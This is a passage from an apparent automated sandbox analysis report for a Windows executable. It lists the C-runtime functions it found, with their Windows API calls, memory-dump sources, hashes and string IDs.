                                                                                                                                      • Opcode Fuzzy Hash: 96197bebab3475913bda7d7a5ef5579782acea42364ade5425c96e81d45f7c16
                                                                                                                                      • Instruction Fuzzy Hash: 2B51F0B19053849BDB00AF26CC84A2EB7E6FF8A714F144A2DF4899B352E734D984D752
                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006E2243
                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 006E230F
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006E2328
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 006E2332
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                      • Opcode ID: 06d7a119bd63e8690daf102b7eb9d64935ddc6679faf571e36643d41dba4d9d8
                                                                                                                                      • Instruction ID: 0d66a2568fdc5de7e3b4e9385323c33eca9f0acd0bfcbb97d7e4ea28ed04adb1
                                                                                                                                      • Opcode Fuzzy Hash: 06d7a119bd63e8690daf102b7eb9d64935ddc6679faf571e36643d41dba4d9d8
                                                                                                                                      • Instruction Fuzzy Hash: DB3123B5C02329DADB20DFA1D8497CDBBB9AF08300F1041EAE50CAB250EB719B85CF45
                                                                                                                                      APIs
                                                                                                                                      • CryptContextAddRef.ADVAPI32(00000000,00000000,00000000), ref: 006E13BC
                                                                                                                                      • CloseFigure.GDI32(00000000), ref: 006E13C3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseContextCryptFigure
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3489608352-0
                                                                                                                                      • Opcode ID: 52695599c67a8e4c1ad840eb7d8a1c9ed58c3f0e3f5f91c88efbbeee7817f83d
                                                                                                                                      • Instruction ID: 204ffdf0d4caacaeaf0699a9098e4e887fe3a2c83692bf311fac4ceadcaed4f8
                                                                                                                                      • Opcode Fuzzy Hash: 52695599c67a8e4c1ad840eb7d8a1c9ed58c3f0e3f5f91c88efbbeee7817f83d
                                                                                                                                      • Instruction Fuzzy Hash: B461387160A3848FC718AF3AD8946FFBBD69FD6704F14493CE5DA8B341D63099019792
                                                                                                                                      APIs
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 006E2B17
                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 006E2B1F
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 006E2BA8
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 006E2BD3
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 006E2C28
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                      • String ID: csm$'n
                                                                                                                                      • API String ID: 1170836740-47889775
                                                                                                                                      • Opcode ID: 358801c20e361bee26f45e47be5fca48f528460eab6f4ba4226f3c3b2831525b
                                                                                                                                      • Instruction ID: 8e8e9df1c27d2be6221e041fca207c97ac235937fe9b72dabb81b83859a72b67
                                                                                                                                      • Opcode Fuzzy Hash: 358801c20e361bee26f45e47be5fca48f528460eab6f4ba4226f3c3b2831525b
                                                                                                                                      • Instruction Fuzzy Hash: 5041E734A0134A9BCF10DF6AC890AAE7BBBFF44328F148159E9159B352D7319A01CB90
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 127012223-0
                                                                                                                                      • Opcode ID: 8edab8412280b2bdb4743cde40655e18d5406827e1868a313f12b0725d6c7f69
                                                                                                                                      • Instruction ID: 35fb939eacbd42ddf476261ebab43298436a9426668e9a0434b03d9d6225f535
                                                                                                                                      • Opcode Fuzzy Hash: 8edab8412280b2bdb4743cde40655e18d5406827e1868a313f12b0725d6c7f69
                                                                                                                                      • Instruction Fuzzy Hash: E171167290124FABDF21AF95CC61BFE77BBAF45350F280059EA14AB382D6709C448F65
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strrchr
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3213747228-0
                                                                                                                                      • Opcode ID: 3825fff6bd7fd7d33fbd87751acabf464b2013d176b50613b12fd40d88381faf
                                                                                                                                      • Instruction ID: 943c52e830fa96b2c655e3949755090598e1b225c93fda49e5ff099aac8e6bb6
                                                                                                                                      • Opcode Fuzzy Hash: 3825fff6bd7fd7d33fbd87751acabf464b2013d176b50613b12fd40d88381faf
                                                                                                                                      • Instruction Fuzzy Hash: 26B11772A023D5AFDF118F26CC81BEE7BA6EF56310F184569E904AF382D2749905C7B4
                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,006E70F4,006E1807,?,00000000,006E1A21,006E1809,?,006E6EA6,00000022,FlsSetValue,006F5878,006F5880,006E1A21), ref: 006E70A6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                      • API String ID: 3664257935-537541572
                                                                                                                                      • Opcode ID: 550867dee31a101d307e2d98509f5a01f8bf35ae33a84db586f2addfae1c315b
                                                                                                                                      • Instruction ID: 3456370ccfff0ded8c5fdfa410db4592bf0f190ff53eb751d3ec18bf967c42ae
                                                                                                                                      • Opcode Fuzzy Hash: 550867dee31a101d307e2d98509f5a01f8bf35ae33a84db586f2addfae1c315b
                                                                                                                                      • Instruction Fuzzy Hash: 112127B5A06350ABC7219B66DC80AAA776B9F813A0F250125FD05A73D0D630FD01C6D1
                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(?,?,006E689E,006E28C9,006E2390), ref: 006E68B5
                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006E68C3
                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006E68DC
                                                                                                                                      • SetLastError.KERNEL32(00000000,006E689E,006E28C9,006E2390), ref: 006E692E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                      • Opcode ID: c2597989f57cc474330d0ddd73f7bd5de985a5f97e2b3463f704b1e2b0a9efab
                                                                                                                                      • Instruction ID: 450dd46ddda72eb35976a2080b94fc858bec7232ff5587f4270e9c1c97782a02
                                                                                                                                      • Opcode Fuzzy Hash: c2597989f57cc474330d0ddd73f7bd5de985a5f97e2b3463f704b1e2b0a9efab
                                                                                                                                      • Instruction Fuzzy Hash: AC01D87210B3525EE76427BBFDD68772B97EB217F5320122DF114412E2EF214C22D5A5
                                                                                                                                      APIs
                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 006F0495
                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 006F070E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                      • API String ID: 2673424686-393685449
                                                                                                                                      • Opcode ID: 01f810fc2b6242933f29e88043c091f7b7991e27848a889f5474da80c6d8ae92
                                                                                                                                      • Instruction ID: 7d3d1a6ed121e1949a330bea2702b6a675342a1b68507622fbaa90a569fdebfc
                                                                                                                                      • Opcode Fuzzy Hash: 01f810fc2b6242933f29e88043c091f7b7991e27848a889f5474da80c6d8ae92
                                                                                                                                      • Instruction Fuzzy Hash: AEB17A7180120DEFDF14DFA5C9819AEBBB6BF54300B14455EFA05AB252C730EA61CFA5
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,006F42A9,000000FF,?,006E556F,006E5456,?,006E560B,00000000), ref: 006E54E3
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,006F42A9,000000FF,?,006E556F,006E5456,?,006E560B,00000000), ref: 006E54F5
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,006F42A9,000000FF,?,006E556F,006E5456,?,006E560B,00000000), ref: 006E5517
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                      • Opcode ID: d846f00ca7520a3bb3fb7b662b8c16ffd75db935e0026539efdeac447d2a1fc7
                                                                                                                                      • Instruction ID: 7de72297281c916829d31cdcdfc5d3dc6940ac590f35679f05fea54e88e67299
                                                                                                                                      • Opcode Fuzzy Hash: d846f00ca7520a3bb3fb7b662b8c16ffd75db935e0026539efdeac447d2a1fc7
                                                                                                                                      • Instruction Fuzzy Hash: 0001D671914A59EFDB018F91DD09FBEBBBBFB44B18F004629F812E2690DF749900CA90
                                                                                                                                      APIs
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 006EC8BD
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 006EC986
                                                                                                                                      • __freea.LIBCMT ref: 006EC9ED
                                                                                                                                        • Part of subcall function 006E8CFD: HeapAlloc.KERNEL32(00000000,006E1A21,006E1807,?,006E29D3,006E1809,006E1807,?,?,?,006E19DE,006E1A21,006E180B,006E1807,006E1807,006E1807), ref: 006E8D2F
                                                                                                                                      • __freea.LIBCMT ref: 006ECA00
                                                                                                                                      • __freea.LIBCMT ref: 006ECA0D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1096550386-0
                                                                                                                                      • Opcode ID: 6355b7ec01272bb924e9f480669679dc7595c0336b99740d770665caab44a030
                                                                                                                                      • Instruction ID: 347923db100b643eaad98117692ffe7fbe5c910dbd0acde0c3d056f0b1c90a40
                                                                                                                                      • Opcode Fuzzy Hash: 6355b7ec01272bb924e9f480669679dc7595c0336b99740d770665caab44a030
                                                                                                                                      • Instruction Fuzzy Hash: 1351A4725023CAAFEB109F66CC42DFB3AABDF44760B25012DFD05D7252EA30DC128665
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,006EC66B,?,006E1809,006E1807,?,?,?,006EC4B3,00000000,FlsAlloc,006F61B0,006F61B8), ref: 006EC5DC
                                                                                                                                      • GetLastError.KERNEL32(?,006EC66B,?,006E1809,006E1807,?,?,?,006EC4B3,00000000,FlsAlloc,006F61B0,006F61B8,?,?,006E6855), ref: 006EC5E6
                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,006E6855,006E6939,00000003,006E38BB,?,?,?,?,00000000,006E1807,006E1807), ref: 006EC60E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                      • String ID: api-ms-
                                                                                                                                      • API String ID: 3177248105-2084034818
                                                                                                                                      • Opcode ID: 635a63289acbd1232adfe1778a1cc95eef004b1633f88e9a19df7bdc2613d725
                                                                                                                                      • Instruction ID: 2695a1a8c3d116751cb260ddd4c36b9bee1c60ec6d30ab0b71fc1d30c04e837f
                                                                                                                                      • Opcode Fuzzy Hash: 635a63289acbd1232adfe1778a1cc95eef004b1633f88e9a19df7bdc2613d725
                                                                                                                                      • Instruction Fuzzy Hash: 3DE04870681344B7DF201FA6DC06B6D3B67AF00BD2F105031F90CA85E2D771E815C589
                                                                                                                                      APIs
                                                                                                                                      • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 006ECF62
                                                                                                                                        • Part of subcall function 006EBC8C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006EC9E3,?,00000000,-00000008), ref: 006EBCED
                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006ED1B4
                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006ED1FA
                                                                                                                                      • GetLastError.KERNEL32 ref: 006ED29D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2112829910-0
                                                                                                                                      • Opcode ID: db0fda45cfa075caff4e33604e3c2cdfe5b067690ea4276a875a00988aba41d8
                                                                                                                                      • Instruction ID: 1cc896459c7c58b9b123e7ef5760bccaa746337ff022205452212a70c4b8ec60
                                                                                                                                      • Opcode Fuzzy Hash: db0fda45cfa075caff4e33604e3c2cdfe5b067690ea4276a875a00988aba41d8
                                                                                                                                      • Instruction Fuzzy Hash: 81D16BB5D012889FCF15CFA9C880AEEBBB6FF49310F28416AE515EB351D630A942CB50
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                      • Opcode ID: a0c30fd6477b10d81d240149fe2ae3b68de2f426e6e2b280c5ab557c07436929
                                                                                                                                      • Instruction ID: 2d780972ffc3ce59dbd9c23b501b600ced7d850b698f5cbbbeac7d11aab22b50
                                                                                                                                      • Opcode Fuzzy Hash: a0c30fd6477b10d81d240149fe2ae3b68de2f426e6e2b280c5ab557c07436929
                                                                                                                                      • Instruction Fuzzy Hash: 1851DF7260230A9FFB28CF95D851BBA73ABEF00310F24412DEE0156292E731EC85CB90
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 006EBC8C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006EC9E3,?,00000000,-00000008), ref: 006EBCED
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,006EB35E,?,?,?,00000000), ref: 006EB01C
                                                                                                                                      • __dosmaperr.LIBCMT ref: 006EB023
                                                                                                                                      • GetLastError.KERNEL32(00000000,006EB35E,?,?,00000000,?,?,?,00000000,00000000,?,006EB35E,?,?,?,00000000), ref: 006EB05D
                                                                                                                                      • __dosmaperr.LIBCMT ref: 006EB064
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1913693674-0
                                                                                                                                      • Opcode ID: 3a09a0f7c72dff088ea1b71936027e9825277e422d31c7612ab7938b80e9f6e7
                                                                                                                                      • Instruction ID: a9be6e614674c57d3befd7757d18ef080a2b761b2113d71766f6d04707c7701a
                                                                                                                                      • Opcode Fuzzy Hash: 3a09a0f7c72dff088ea1b71936027e9825277e422d31c7612ab7938b80e9f6e7
                                                                                                                                      • Instruction Fuzzy Hash: 3E21AFB1202395AFDB20AFA3888196BB7ABFF00364710841CF86997250DB30FC41CBA1
                                                                                                                                      Memory Dump Source
